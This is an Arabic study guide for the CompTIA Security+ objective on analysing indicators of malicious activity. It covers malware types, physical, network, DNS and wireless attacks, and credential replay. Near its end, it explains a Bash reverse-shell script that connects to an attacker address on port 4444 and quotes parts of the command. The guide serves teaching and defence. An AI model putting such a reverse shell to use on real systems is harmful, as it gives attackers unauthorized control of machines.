شرح الفصل الثامن من شهادة Security Plus بعنوان Given a scenario, analyze indicators of malicious activity الجزء الأول

Safely LocK
0
الفصل الثامن

العنوان : Given a scenario, analyze indicators of malicious activity

الجزء الاول : #1 
 

تحليل مؤشرات النشاط الضار في سيناريوهات محددة (Given a scenario, analyze indicators of malicious activity):



يتناول هذا الفصل الهدف الرابع من المجال الثاني في امتحان"CompTIA Security Plus"، والذي يشمل التهديدات والثغرات والتدابير الوقائية، في هذا الفصل، سنقوم بفحص مؤشرات النشاط الضار والأنواع المختلفة من البرمجيات الضارة والهجمات التي قد نواجهها يوميًا.

سيساعدك هذا الفصل على تحليل مؤشرات الأنشطة الضارة للحفاظ على بيئة آمنة وضمان استعدادك للإجابة بنجاح على جميع الأسئلة المتعلقة بهذه المفاهيم في اختبار الشهادة الخاص بك.


الهجمات باستخدام البرمجيات الضارة (Malware Attacks):

البرمجيات الضارة (malicious software) هي أي برنامج أو كود مصمم خصيصًا لتعطيل أو إلحاق الضرر بأنظمة الكمبيوتر أو الشبكات أو الأجهزة أو الوصول غير المصرح به إليها ، وتُنشأ البرمجيات الضارة بنية خبيثة، ويمكن أن تتخذ أشكالًا متعددة مثل الفيروسات، والديدان، والتروجان، وبرامج التجسس، والإعلانات الضارة، وبرامج الفدية وغيرها، كل نوع من هذه البرمجيات له وظائف وأهداف محددة، لكنهم جميعًا يشتركون في الهدف الأساسي وهو التسبب في ضرر أو اختراق النظام أو البيانات المستهدفة، وستغطي الأقسام التالية كل نوع من الهجمات باستخدام البرمجيات الضارة، بما في ذلك طرقها وأهدافها، بالإضافة إلى بعض تقنيات الوقاية منها.
 
البرامج غير المرغوب فيها (PUPs):

البرامج غير المرغوب فيها ("
Potentially Unwanted Programs - PUPs") هي برامج يتم تنزيلها كجزء من برامج أخرى. غالبًا ما تستهلك هذه البرامج موارد الحاسوب بشكل كبير وتبطئ عمله، تُعتبر "PUPs" برامج رمادية لأنها ليست ضارة بالكامل وليست شرعية بالكامل، يمكن للبرامج مثل "Malwarebytes" تنبيهك إلى هذه الأنواع من التنزيلات وإعطائك الخيار لحذفها.
 
برامج الفدية (Ransomware):

برامج الفدية تشفر الملفات الخاصة وتطلب دفع فدية لإطلاق سراحها، ويمكن لبرامج الفدية الوصول إلى حواسيبنا عبر البريد الإلكتروني أو عند زيارة مواقع ضارة، بمجرد إصابة الحاسوب، يتم تشفير البيانات وتظهر رسالة فدية رقمية على شاشة المستخدم تطالب بالدفع بعملة رقمية، غالبًا ما تتضمن هذه الرسالة ساعة تعد تنازليًا لإضافة المزيد من الضغط على الضحية، وتترك هذه البرامج الضحية أمام خيار صعب: الأول الامتثال ودفع الفدية على أمل استعادة البيانات أو الثاني الرفض ومواجهة احتمال فقدان المعلومات الحيوية.


التروجان (Trojans):

التروجان هو برنامج خادع يتم تصميمه لخداع المستخدمين بتقديم نفسه كبرنامج شرعي، ولكنه في الواقع برنامج ضار، ويمكن أن يتم حقن التروجان في صفحات الويب من خلال حقن الأكواد، وبمجرد تثبيته، يمكن للتروجان القيام بالعديد من الإجراءات الضارة مثل إعداد باب خلفي يسمح للمهاجم بتجاوز نظام المصادقة والدخول إلى النظام في أي وقت. يمكن استخدام التروجان أيضًا للمراقبة أو سرقة الموارد.

التروجان للوصول عن بعد (Remote Access Trojans  RATS):

التروجان للوصول عن بعد هو نوع من التروجان الذي يمنح المهاجمين القدرة على التحكم عن بعد في الأجهزة المصابة. يسمح هذا النوع من التروجان للمهاجم بالتحكم في الحاسوب المصاب من مسافة آمنة، ويمكنه تنفيذ أنشطة ضارة مثل سرقة البيانات أو تثبيت برامج ضارة أخرى.
 
الـ (Worms):
 
 هي نوع من البرمجيات الضارة التي تنتشر ذاتيًا ويمكن أن تتواجد في ذاكرة الحاسوب، تتميز الديدان بقدرتها الذاتية على التكرار والانتشار عبر الشبكات، مستغلة الثغرات الأمنية في الأنظمة لزيادة انتشارها.
 
برامج التجسس (Spyware):
برامج التجسس تستخدم سرًا موارد الحاسوب لتتبع أنشطة المستخدم وجمع المعلومات قبل إرسالها إلى أطراف ثالثة، قد تتضمن المعلومات التي تجمعها برامج التجسس أسماء المستخدمين، وعناوين البريد الإلكتروني، وأحيانًا معلومات حساسة مثل أرقام بطاقات الائتمان.

البرامج المحشوة (Bloatware):
البرامج المحشوة هي برامج تأتي مثبتة مسبقًا على الأجهزة الجديدة وتستهلك موارد الجهاز بشكل كبير، مما يؤدي إلى إبطاء الأداء، وعلى الرغم من أنها ليست ضارة بالضرورة، إلا أنها تؤثر سلبًا على تجربة المستخدم.
 
الفيروسات (Viruses):

الفيروسات تهدف إلى سرقة البيانات الحساسة أو تعطيل الأنظمة أو نشر المزيد من البرمجيات الضارة. تستغل الفيروسات الثغرات في الأنظمة أو البرامج، وغالبًا ما تعتمد على سلوك المستخدم مثل فتح رسائل البريد الإلكتروني أو تنزيل ملفات غير موثوقة.
 
الفيروسات المتغيرة (Polymorphic Viruses):

الفيروسات المتغيرة تستخدم تقنيات متطورة لتعديل أكوادها، مما يجعلها تظهر بشكل مختلف مع كل إصابة جديدة، وهذا يعقد عملية اكتشافها باستخدام الطرق التقليدية التي تعتمد على التوقيعات.
 
مسجلات المفاتيح (Keyloggers):

مسجلات المفاتيح هي برامج تسجل ضغطات المفاتيح على لوحة المفاتيح بشكل خفي، مما يمكن المهاجمين من سرقة المعلومات الحساسة مثل كلمات المرور وتفاصيل بطاقات الائتمان.
 
القنابل المنطقية (Logic Bombs):

القنابل المنطقية هي برمجيات خبيثة تبقى في حالة خمول حتى يتم تفعيلها وفقًا لشروط محددة، مثل وقت معين أو إجراء محدد. يمكن أن تؤدي هذه القنابل إلى حذف الملفات أو تخريب البيانات.
 
الجذور الخفية (Rootkits):

الجذور الخفية هي برمجيات ضارة تتسلل إلى أعماق أنظمة التشغيل، مما يجعل اكتشافها صعبًا، وتمنح هذه البرمجيات المهاجمين القدرة على التحكم الكامل في الأجهزة المصابة.
 
فحص البرمجيات الضارة (Malware Inspection):

عند فحص البرمجيات الضارة أو الفيروسات، تحتاج فرق الأمن السيبراني إلى استخدام sandbox
، والـ "Sandbox" هو آلة افتراضية معزولة، لكن يمكن استخدام أدوات "sandboxing" مثل "Cuckoo" ، وهو "sandbox" مفتوح المصدر. والنتيجة هي أنه بالرغم من أن التطبيق ضار، إلا أنه لا يؤثر على مستخدمي الشبكة.

الهجمات الفيزيائية (Physical Attacks):

الهجوم الفيزيائي يتضمن استخدام تكتيكات خفية لاختراق المساحات الفيزيائية الفعلية، وفكر في الأمر على أنه قيام "الأشرار" باستخدام تكتيكات تتجاوز الشاشة  مثل تجربة كلمات مرور مختلفة بشكل متكرر حتى ينجحوا في الاختراق، أو نسخ إشارات سرية للوصول إلى مناطق آمنة، أو حتى التسبب في الفوضى عن طريق تعطيل الكهرباء خلال العواصف، ودعونا نستعرض بعضًا من هذه الهجمات الفيزيائية بالتفصيل.

الهجوم بالقوة الفيزيائية الغاشمة (Physical Brute Force):

الهجوم بالقوة الفيزيائية الغاشمة هو هجوم مباشر حيث يقوم شخص باستخدام أداة فيزيائية (مثل المطرقة الثقيلة أو العتلة) لكسر باب والوصول إلى الداخل لسرقة المعدات، ولا ينبغي الخلط بين هذه الهجمات وهجمات القوة الغاشمة على كلمات المرور التي سيتم مناقشتها لاحقًا في قسم هجمات كلمات المرور في هذا الفصل.

استنساخ ترددات الراديو (RFID):

تخيل سيناريو يقوم فيه متسللون بذكاء بنسخ الإشارات من بطاقات الدخول أو الشارات التي تسمح للناس بالدخول إلى المناطق الآمنة. يُشار إلى هذه الطريقة باسم استنساخ "
RFID"، ويستخدم الجناة أجهزة خاصة لتنفيذ هذه الاستراتيجية لنسخ وتقليد هذه الإشارات، مما يمنحهم الوصول إلى أماكن لا ينبغي لهم التواجد فيها. وهناك طريقة مشابهة تُسمى "skimming"، حيث يتم استخدام قارئ بطاقة مزيف لاستنساخ البطاقة. اقتناء قارئ بصمات الأصابع سيساهم في تعزيز أمان الوصول من خلال تقديم خاصية "Multifactor Authentication (MFA)".

الهجمات البيئية (Environmental):

الهجمات الفيزيائية البيئية تستغل عدم التنبؤ بالظواهر الطبيعية لإحداث فوضى رقمية، وانقطاع التيار الكهربائي، الفيضانات، الحرائق، وحتى الزلازل يمكن أن تكون نقاط انطلاق للاضطرابات السيبرانية. فالأضرار التي تتبع مثل هذه الأحداث تخلق بيئة خصبة للاستغلال، حيث تتيح الأنظمة المخترقة والدفاعات الضعيفة فرصًا للمجرمين السيبرانيين للاختراق وسرقة البيانات، وقد يقوم المهاجم بإتلاف خطوط الكهرباء المتصلة بالمؤسسة، مما يؤدي إلى تعطل الخوادم وتلف قواعد البيانات.

الدفاع ضد الهجمات الفيزيائية البيئية يتطلب تصميم أنظمة قوية قادرة على تحمل تأثير الكوارث البيئية، مما يضمن بقاء مراكز البيانات والبنية التحتية الحيوية قيد التشغيل حتى في مواجهة الكوارث، التنوع الجغرافي، والتكرار، وخطط التعافي من الكوارث هي أدوات حيوية لتخفيف الأضرار الناجمة عن العوامل البيئية، وكما أن الاختبارات الدورية، والتدريبات على المحاكاة، والمراقبة المستمرة تعزز الاستعداد من خلال تمكين المؤسسات من الاستجابة بسرعة لتقليل آثار هذه الهجمات.

 الهجمات على الشبكات (Network Attacks):

الهجوم على الشبكة هو محاولة غير مصرح بها وخبيثة لتعطيل أو اختراق أو الوصول إلى أنظمة الحاسوب أو البيانات أو الاتصالات داخل الشبكة، غالبًا لأغراض ضارة، والهجمات على الشبكات تستهدف المنظمات والأسر على حد سواء، ومعظم هذه الهجمات تُعرف بـ "الهجمات على جهة الخادم" لأنها تستهدف خوادم المنظمة، مثل وحدات التحكم في النطاق (domain controllers) التي تحتوي على حسابات المستخدمين، أو خوادم قواعد البيانات SQL التي تحتوي على بيانات سرية للعملاء ومعلومات بطاقات الائتمان.

سوف نستعرض في الأقسام التالية عدة أنواع من الهجمات على الشبكات.

 الهجوم المحوري (Pivoting):

يتم تنفيذ الهجوم المحوري عندما يتمكن المهاجم من الوصول إلى الشبكة عبر مضيف ضعيف ويستهدف خادمًا حيويًا مثل وحدة التحكم في النطاق أو خادم قاعدة البيانات ، وعلى الشبكة الافتراضية، يُعرف هذا النوع من الهجمات باسم "VM escape"، والذي سيتم تغطيته في الفصل السابع.

عندما يشن المهاجم هجومًا محوريًا، فإنه من المحتمل أن يكون مجهزًا بأداة Network Mapper (nmap) التي يستخدمها لرسم خريطة للشبكة بالكامل وإنشاء قائمة بجميع المضيفين وإصدارات البرامج والمنافذ المفتوحة والخدمات التي تعمل على المضيف المستهدف. يُعرف هذا الرسم بالخريطة بـ "fingerprinting"، وبعد أن يقوم المهاجم برسم خريطة الشبكة بالكامل، يهاجم خوادم قواعد البيانات SQL ووحدات التحكم في النطاق بهدف الوصول إلى حساب إداري، وإذا تمكن المهاجم من الوصول إلى حساب إداري، فإنه سينشئ المزيد من الحسابات الإدارية للحفاظ على وجوده في الشبكة حتى إذا تم كشف حسابه الأول.
 
 هجوم حجب الخدمة الموزع (DDoS):

هجوم حجب الخدمة (DoS) يشير إلى نوع من الهجوم حيث يقوم مضيف واحد بمنع خدمات الضحية من العمل. أما هجوم حجب الخدمة الموزع (DDoS) فيُشن من عدة مضيفين، قد تصل إلى الآلاف، لإيقاف خدمات الضحية. في هذا النوع من الهجمات، يقوم المهاجم بوضع برامج ضارة على أجهزة الحواسيب/الأجهزة حتى يتمكن من التحكم في هذه الأجهزة التي أصبحت الآن روبوتات (وتُعرف مجموعة من هذه الروبوتات باسم "botnet").

الـ "botnet" هي مجموعة من الأجهزة، مثل الحواسيب أو الأجهزة الذكية IoT، التي تتعاون للهجوم على نظام الضحية وتعطيله، وتنتظر هذه الأجهزة إشارة، وعند وصولها، ترسل كمية ضخمة من البيانات لإغراق النظام المستهدف. إحدى الطرق التي يتم بها ذلك هي هجوم "SYN flood" باستخدام العديد من الاتصالات غير المكتملة، والنظام المستهدف يتوقع حزمة "
ACK"، وهي الجزء الثالث من المصافحة الثلاثية لـ TCP/IP، لكنه لا يتلقاها أبدًا، مما يستهلك الموارد ويؤدي في النهاية إلى عدم قدرة النظام على معالجة الطلبات الشرعية. يتم شرح المصافحة الثلاثية لـ TCP/IP في الفصل 18 (في الفصل القادم).

هناك أنواع مختلفة من هجمات DDoS، بدءًا من الهجمات التي تعتمد على حجم البيانات (volume-based) التي تخنق النطاق الترددي إلى الهجمات على طبقة التطبيقات (application-layer) التي تستغل الثغرات الأمنية، ولكن جميع هذه الهجمات تستهدف نقاط الضعف في الأنظمة، وتستغل أي ثغرة في الدرع الرقمي، والدوافع وراء هجمات DDoS متنوعة مثل أساليبها، بما في ذلك الابتزاز المالي، والتخريب الإلكتروني (hacktivism)، والصراعات الجيوسياسية، والدفاع ضد هجمات DDoS يتطلب مجموعة واسعة من الاستراتيجيات، بما في ذلك تحسينات الشبكة، تصفية حركة المرور، وآليات الاستجابة التكيفية، ومن أصعب الهجمات التي يجب التعامل معها هي تلك التي تعمل على تضخيم أو عكس حركة المرور إلى الضحية، هذان النوعان مفصلان هنا:

  • التضخيم (Amplified): الهجمات الموجهة بالتضخيم تستخدم مبدأً أساسيًا في اتصالات الشبكة، وهو القدرة على إرسال طلب صغير يؤدي إلى استجابة أكبر بكثير، وعندما يتم استغلال هذا المبدأ بشكل ضار، يؤدي إلى تضخيم حركة المرور الموجهة إلى الضحية. يستغل المهاجمون البروتوكولات التي تولد استجابات كبيرة مقابل إدخال بسيط، مثل بروتوكول Internet Control Message Protocol (ICMP)، هنا يأتي دور عامل التضخيم، مما يسمح للمهاجمين بإغراق أهدافهم بحجم هائل من حركة المرور.

  • الانعكاس (Reflected): في الهجمات المنعكسة، يحصل المهاجم على عنوان IP الخاص بالضحية ويُعد حزمة بيانات تبدو كما لو أنها قادمة من الضحية، وثم يتم إرسال هذه الحزمة إلى خوادم تقوم بإعادة إرسالها عن غير قصد، مما يؤدي إلى تدفق حركة المرور الذي يغمر خادم الضحية ويستهلك كل عرض النطاق الترددي.
 
 تسميم (ARP Poisoning):

بروتوكول Address Resolution Protocol (ARP) يعمل في الطبقة الثانية من نموذج OSI باستخدام عناوين Media Access Control (MAC)، ويقوم بربط عناوين IP مع عناوين MAC. هجوم تسميم ARP يحدث عندما يتم إغراق شبكة محلية (LAN) برسائل ARP مزيفة حيث يتطابق عنوان IP للضحية مع عنوان MAC الخاص بالمهاجم، بمجرد حدوث ذلك، يتم إرسال حركة المرور الموجهة للضحية إلى عنوان المهاجم. يمكن أن يحدث هذا فقط على الشبكة المحلية (LAN)؛ قد تكون الضحايا جهاز توجيه (router) أو محول (switch).
 
 الهجمات على نظام أسماء النطاقات (DNS)

الـ 
DNS هو العمود الفقري للإنترنت، فهو المسؤول عن ترجمة أسماء المضيفين أو أسماء النطاقات مثل www.hiddenlockteam.com إلى عناوين IP رقمية التي تفهمها الحواسيب، ويعمل كدليل عالمي يضمن وصول المستخدمين إلى وجهاتهم على الإنترنت بسلاسة. ومع ذلك، هذا النظام الأساسي ليس محصنًا ضد الاستغلال، وعندما يقوم المستخدم بكتابة عنوان موقع ويب في متصفح الويب، يستخدم عملية DNS resolution للعثور على عنوان IP الخاص بالموقع، ولكن يمكن أن تكون هذه العملية عرضة للهجمات. المفاهيم الأساسية المتعلقة بـ DNS والهجمات على النظام هي كما يلي:
 
  • تحليل الاسم DNS name resolution: عندما يقوم شخص ما بكتابة عنوان URL لموقع ويب، على سبيل المثال www.packt.com، يقوم خادم DNS باستخدام تحليل الاسم (DNS resolution) لتحويل عنوان URL www.packt.com إلى عنوان IP الخاص به. عملية تحليل الاسم تحدث بالترتيب التالي
  • DNS cache: يقوم النظام أولاً بفحص DNS cache. هذا يتم تخزينه على الجهاز المحلي. لعرض الـ cache، يمكنك كتابة الأمر `ipconfig /displaydns` في موجه الأوامر (Command Prompt). نظرًا لأن DNS cache هو المكان الأول الذي يتم زيارته لحل DNS، فإنه يُعتبر هدفًا أساسيًا للمهاجمين.
  • ملف HOSTS: إذا لم يكن عنوان URL موجودًا في DNS cache، فإن النظام يتحقق بعد ذلك من ملف HOSTS. هذا الملف هو ملف نصي على الكمبيوتر المحلي. يتم تخزينه على أجهزة الكمبيوتر التي تعمل بنظام Windows تحت المسار `C:\Windows\System32\drivers\etc`.
 
  • Root hints: إذا لم يكن عنوان URL موجودًا في الـ cache أو في ملف HOSTS، فإن النظام يقوم بعد ذلك باستشارة الـ root hints، التي غالبًا ما تقوم بتحويل عملية الـ resolution إلى خوادم DNS أخرى على الإنترنت.
  • DNS sinkhole: يقوم الـ DNS sinkhole بتحديد النطاقات الخبيثة المعروفة ويرسل معلومات زائفة إلى المهاجمين المحتملين، مما يمنعهم من تنفيذ الهجوم. بدلاً من ذلك، قد يوجه الـ sinkhole المهاجمين إلى honeypot لمزيد من التحليل.

  • DNS cache poisoning: يحدث DNS cache poisoning (أو DNS spoofing) عندما يقوم المهاجم بت Manipulate سجلات DNS لإعادة توجيه المستخدمين إلى مواقع ويب خبيثة، من خلال تسميم DNS cache بمعلومات زائفة، يخدع المهاجمون المستخدمين ليعتقدوا أنهم يزورون مواقع شرعية، بينما يعرضونهم لأنشطة احتيالية. في عملية حل DNS، يتم البحث في الـ DNS cache عن اسم الموقع، لكن المهاجمين قد سمموا الـ cache بإدخالات زائفة لإعادة توجيه الضحية إلى موقع زائف يبدو كأنه الموقع الشرعي المطلوب. قد يضع المهاجمون أيضًا معلومات زائفة في ملف HOSTS، الذي هو المكان الثاني الذي يتم البحث فيه خلال عملية حل DNS.
 
الـ (DNS Commands):
 

تُظهر الجدول التالي أوامر DNS الأساسية التي تُستخدم لإدارة واستكشاف مشاكل الشبكات:

 
 
الجدول الاول في الفصل: أوامر DNS لإدارة الاتصال بالشبكة




الـ (DNS Tools):

تلعب أدوات وبروتوكولات DNS دوراً حاسماً في أمان الشبكة وجمع المعلومات. DNSenum، وهو جزء من Kali Linux ، يمكن تثبيته على اي نظام لينكس أيضاً، وهو أداة قوية لجمع معلومات شاملة حول DNS، ومن ناحية أخرى، يعد DNSSEC بروتوكولاً حاسماً يعزز أمان DNS عن طريق استخدام التوقيعات الرقمية لصد هجمات التسمم لذاكرة تخزين DNS.

تذكير:
تسمم ذاكرة تخزين DNS يوجه الضحية من موقع إلكتروني شرعي إلى موقع احتيالي. يمكن أيضاً تسميته بتزييف DNS.


الهجمات اللاسلكية (Wireless Attacks):

أصبحت الشبكات اللاسلكية جزءاً أساسياً من حياتنا اليومية، حيث توفر الاتصال السلس والراحة، وهذا يوفر قناة هجوم للمهاجمين لاستغلال الثغرات وتنفيذ الهجمات اللاسلكية، ويمكننا استخدام جهاز مسح Wi-Fi لتحديد الأنشطة الخبيثة، ومن الضروري فهم التكتيكات والتقنيات والإجراءات التي يستخدمها المهاجمون. يمكن استخدام الطريقتين التاليتين لبدء هجوم لاسلكي:

  • نقاط الوصول غير الشرعية (Rogue access points): نقطة الوصول غير الشرعية تتظاهر بأنها نقطة وصول لاسلكية شرعية لخداع المستخدمين للاتصال ومشاركة المعلومات الحساسة، هذا العمل الماكر يؤدي غالباً إلى الوصول غير المصرح به، وتسرب البيانات، وحتى انتشار البرمجيات الخبيثة. يمكنك تثبيت نقطة وصول غير شرعية على Raspberry Pi،  وتعمل نقطة الوصول غير الشرعية كبوابة لجهازك، مما يمنح المهاجمين فرصة لاعتراض اتصالاتك، ومراقبة نشاطك على الإنترنت، أو حتى حقن حمولات خبيثة.

  • التوأم الشرير (Evil twin): التوأم الشرير يأخذ مفهوم نقطة الوصول غير الشرعية إلى مستوى آخر. فهو لا يتظاهر فقط بأنه شبكة حقيقية، بل أيضاً يعترض الاتصالات بين المستخدمين والشبكة الشرعية، وعندما تتصل بشكل غير متعمد بتوأم شرير، فإنك تسلم بياناتك للمهاجمين الذين يمكنهم التنصت على نشاطك على الإنترنت أو إطلاق هجمات على جهازك.

لإنشاء توأم شرير، يقوم المهاجمون بإنشاء شبكة مكررة باسم (SSID) مشابه لشبكة معروفة، مثل مقهى شهير أو فندق، ويتم خداع المستخدمين للاتصال، معتقدين أنهم يصلون إلى شبكة موثوقة، وغالباً ما تقوم التوائم الشريرة بتعديل إعدادات التشفير وإجراءات التوثيق، مما يجعل من الصعب على المستخدمين التمييز، علامة واضحة على أنك على توأم شرير هي أنك لا تستطيع الوصول إلى بيانات شبكة شركتك، هذا لأنك على شبكة أخرى.

  • هجمات إزالة التوثيق والتشويش: يمكن أن تتضمن الهجمات اللاسلكية تقنيات إزالة التوثيق والتشويش لتعطيل خدمات الشبكة الشرعية، والتشويش غير قانوني ويمنع الضحية من الوصول إلى نقطة الوصول اللاسلكية، وهجوم إزالة التوثيق (المعروف أيضاً بهجوم الفصل) يتم عندما يرسل المهاجم إطارات إزالة توثيق مصممة خصيصاً إلى جهاز واحد أو أكثر متصلة بشبكة Wi-Fi لفصل الكمبيوتر المستهدف عن الشبكة. يمكن استخدام هذه التقنيات أيضاً في هجوم DoS اللاسلكي.

تشمل أعراض هذه الهجمات الانفصالات المفاجئة، البطء في سرعات الشبكة، وزيادة عدد محاولات إعادة الاتصال. يمكن أن يساعد تحليل التداخل في الترددات الراديوية ومراقبة انخفاضات الإشارة المفاجئة في اكتشاف هذه المؤشرات.

  • تزييف MAC وتقمص الأجهزة: غالباً ما يشارك المهاجمون في تزييف عنوان MAC لتقمص الأجهزة المصرح بها على الشبكة. التغييرات غير العادية في عنوان MAC، الأجهزة المتعددة بنفس عنوان MAC، أو التغييرات المفاجئة في سلوك الجهاز يمكن أن تشير إلى محاولة تقمص الأجهزة.

  • محلل Wi-Fi: محلل Wi-Fi يستمع إلى إشارات الشبكة، ويحلل تفاصيلها، ويقدم لك نظرة شاملة على مشهد Wi-Fi من خلال مسح الشبكات القريبة، وتحليل قوة الإشارة، وتحديد مصادر التداخل المحتملة، وكما أن محللات Wi-Fi رائعة في كشف الخيوط المخفية لحركة الشبكة غير الطبيعية التي قد تشير إلى خروقات أمان أو تدهور في الأداء.
 
الهجمات على المسار (On-path):

هجمات On-path، التي يُشار إليها غالباً باسم "الرجل في الوسط" أو هجمات الاعتراض، تتضمن قيام الخصم بوضع نفسه لاعتراض الاتصال بين طرفين، ويمكنه اعتراض البيانات المتبادلة، تعديلها، أو التنصت عليها، وهذا التسلل الصامت يمكن أن يمكّن المجرمين السيبرانيين من استغلال المعلومات الحساسة، إطلاق هجمات أخرى، أو حتى التلاعب بالمعاملات دون أن يتم اكتشافهم، والنقاط اللاسلكية الخبيثة و "
evil twins" هي أمثلة على هجمات On-path، وكذلك هجمات "DNS" و"ARP poisoning"، أنواع أخرى من هجمات On-path سيتم تعريفها في الأقسام التالية.
 
إعادة تشغيل الجلسة (Session Replay):

عندما يتصل المستخدم بخادم ويب، يتم إنشاء رمز جلسة (يمكن أن يتم حفظه كملف تعريف الارتباط). في هجوم اختطاف الجلسة، يقوم المهاجم باعتراض الرمز باستخدام Cross-Site Scripting (XSS)، أو man-in-the-browser، أو هجمات man-in-the-middle.
 
هجوم إعادة التشغيل (Replay Attack):

هجوم إعادة التشغيل هو هجوم على المسار يعترض البيانات لكنه يعيد إرسال أو "يكرر" البيانات في وقت لاحق. يمكن أن يمنع Kerberos هذا عن طريق تعيين أرقام تسلسلية فريدة وتوقيتات لكل طلب استيثاق واستجابة، وعلى سبيل المثال، عندما يتم التواصل بين مضيفين على شبكة Windows تستخدم مصادقة Kerberos، يتم نقل البيانات أولاً برقم تسلسلي USN 7، ثم برقم تسلسلي USN 10. ستدرك المضيف المستلم بعد ذلك أن البيانات ليست كما يجب أن تكون.

عندما يتم استقبال USN 8 أو USN 9 في اليوم التالي، سيتم رفضها لأنها خارج التسلسل، مما يمنع هجوم إعادة التشغيل. تستخدم تكتيكات مشابهة مع العديد من التطبيقات والبيانات.
 
إعادة استخدام بيانات الاعتماد (Credential Replay):

من بين الهجمات الإلكترونية الأكثر شيوعاً والأشد ضرراً هي هجمات إعادة استخدام بيانات الاعتماد، التي تتضمن رموزاً خبيثة، أو أدوات تسجيل المفاتيح، أو أدوات التقاط الحزم مثل Wireshark أو tcpdump، أو البرمجيات الخبيثة التي تلتقط بيانات الاعتماد. هناك نوعان رئيسيان من هجمات بيانات الاعتماد كما يلي:

  • هجمات إعادة استخدام بيانات الاعتماد (Credential replay attacks): في هجوم إعادة استخدام بيانات الاعتماد، يقوم المهاجم بالتقاط بيانات اعتماد صالحة (باستخدام أدوات التقاط الحزم مثل Wireshark أو tcpdump) من خلال محاولة تسجيل دخول شرعية، ثم يستخدم نفس البيانات لتقمص المستخدم الشرعي والحصول على وصول غير مصرح به، وهذه واحدة من الأسباب التي تجعل المسؤولين يجب أن يتجنبوا استخدام Telnet للوصول عن بُعد، لأن بيانات الاعتماد ليست مشفرة ويمكن قراءتها بالعين البشرية (أي بالنص العادي). يجب استبدال Telnet بـ Secure Shell (SSH)، وهو بروتوكول يستخدم للإدارة عن بُعد بشكل آمن، حيث تكون جميع الجلسات مشفرة. في بيئة Windows، ينبغي تجنب استخدام بروتوكول المصادقة NT LAN Manager (NTLM) لأنه من التقنيات القديمة وسهل الاختراق.

  • تكديس بيانات الاعتماد (Credential stuffing): هجوم تكديس بيانات الاعتماد يستهدف المستخدمين الذين يقدمون نفس بيانات الاعتماد لكل نظام وتطبيق عبر الإنترنت يقومون بتسجيل الدخول إليه، سواء كان شخصياً أو تجارياً، وإذا تم اختراق أحد الحسابات، سيحاول المهاجم استخدام كلمة المرور ضد جميع الحسابات الأخرى على أمل أن تكون قد أعيد استخدامها، مما يعرض جميع الحسابات التي تتطابق معها للخطر، ويمكن للمنظمات مراقبة عدة مؤشرات، بما في ذلك زيادة مفاجئة في تسجيل الدخول ومحاولات تسجيل الدخول الفاشلة من مواقع جغرافية مختلفة. لتجنب هذا النوع من الهجمات، ينبغي على الشركات إجراء تدريبات توعية بالأمن حيث يجب إبلاغ الموظفين بأن كلمات المرور للوصول إلى أي تطبيق يجب أن تكون فريدة ويجب تشجيع استخدام مدير كلمات المرور.
 
الرموز الخبيثة (Malicious Code):

الرموز الخبيثة تجسد الجانب المظلم من تطوير البرمجيات، حيث يتم تصميمها بهدف اختراق الأنظمة، وسرقة البيانات، وإحداث الفوضى الرقمية، وغالباً ما يمتد استخدامها عبر لغات برمجة مختلفة، مستفيداً من خصائص كل منها لتحقيق أهداف خبيثة.

وتشمل المؤشرات المبكرة لنشاط الرموز الخبيثة أنماط حركة الشبكة غير العادية، وسلوك النظام غير المتوقع، ووجود ملفات أو برامج غير مألوفة، ويمكن أن تساعد المؤشرات المبكرة في الكشف عن هجمات الرموز الخبيثة والتخفيف منها. يمكن أن يكون اكتشاف الشذوذ في حركة الشبكة، مثل الزيادة المفاجئة في نقل البيانات إلى خوادم غير مألوفة، مصحوباً بمراقبة سلوك النظام غير المتوقع، مثل الأعطال المتكررة أو استهلاك غير مفسر لموارد النظام، لتحسين مراقبة الأمن السيبراني.

أمثلة على هجمات الرموز الخبيثة تشمل:

  • هجمات Bash shell : الـ  "Bash shell" هي أداة قوية توجد في معظم أنظمة التشغيل المشابهة لـ Unix، التي يمكن أن تستغل لأغراض خبيثة، وقد يستخدم المهاجمون نصوص Bash لتنفيذ أوامر غير مصرح بها، أو اختراق الأنظمة، أو التلاعب بالملفات. تشمل التكتيكات الشائعة تصعيد الامتيازات، التلاعب بالملفات، واستطلاع النظام. يمكن التعرف على نصوص Bash من خلال امتداد ملف .sh.

النص التالي هو مثال على نص خبيث لفتح قنوات اتصال عكسية مكتوب بلغة Bash ، وتم تصميمه لإنشاء اتصال عكسي من آلة مستهدفة مختراق إلى عنوان IP ومنفذ المهاجم، مما يمنح المهاجم السيطرة على النظام المختراق. الرموز (#) في هذا النص تشير إلى تعليقات ويتم تجاهلها من قبل البرنامج:


الصوره الأولى في الفصل.

النص السابق يقوم أولاً بتحديد عنوان IP الخاص بالمهاجم (192.168.1.100) والمنفذ الذي يريدون الاتصال به (4444)، وقبل تنفيذ قنوات الاتصال العكسية في السطر الأخير، للقيام بذلك، استخدم المهاجم أمر Bash مع إعادة توجيه الإدخال والإخراج لإنشاء اتصال بالآلة الخاصة بالمهاجم. تم استخدام `bash -i` لتشغيل قشرة Bash التفاعلية والسماح للمهاجم بالتفاعل مع سطر الأوامر في النظام المخترق. ثم أضاف "
>&/dev/tcp/$attacker_port" إلى الأمر لإعادة توجيه كل من الإخراج القياسي (stdout) والأخطاء القياسية (stderr) إلى اتصال مقبس الشبكة وإلى عنوان IP والمنفذ الخاص بالمهاجم. أخيرًا، استخدم "0>&1" لإعادة توجيه الإدخال القياسي (stdin) إلى نفس اتصال مقبس الشبكة لإكمال إعداد القشرة العكسية.

سيقوم المهاجم بنشر هذا النص على النظام المستهدف، وإذا قام النظام المستهدف بتنفيذه (عادةً من خلال الهندسة الاجتماعية، استغلال الثغرات، أو وسائل أخرى)، فسيبدأ اتصال قشرة عكسية من النظام المستهدف إلى آلة المهاجم، وسيمنح هذا المهاجم وصولًا غير مصرح به إلى سطر أوامر النظام المخترق، مما قد يسمح لهم بتنفيذ الأوامر، وسرقة البيانات، أو القيام بأنشطة خبيثة أخرى.

تعد Python بسيطة ومتعددة الاستخدامات وللأسف قد لاقت أيضًا قبولاً بين المجرمين الإلكترونيين، ويمكن للبرامج النصية الخبيثة المكتوبة بلغة Python تنفيذ مجموعة واسعة من الأفعال، من تسجيل المفاتيح إلى استخراج البيانات، ويمكن للمهاجمين توزيع البرمجيات الخبيثة المبنية على Python من خلال رسائل البريد الإلكتروني التصيدية، المرفقات الخبيثة، أو المواقع المدمرة. الطبيعة الديناميكية لـ Python تتيح تطوير ونشر الحمولات الخبيثة بسرعة. يمكن التعرف على النصوص المكتوبة بـ Python من خلال امتداد الملف "
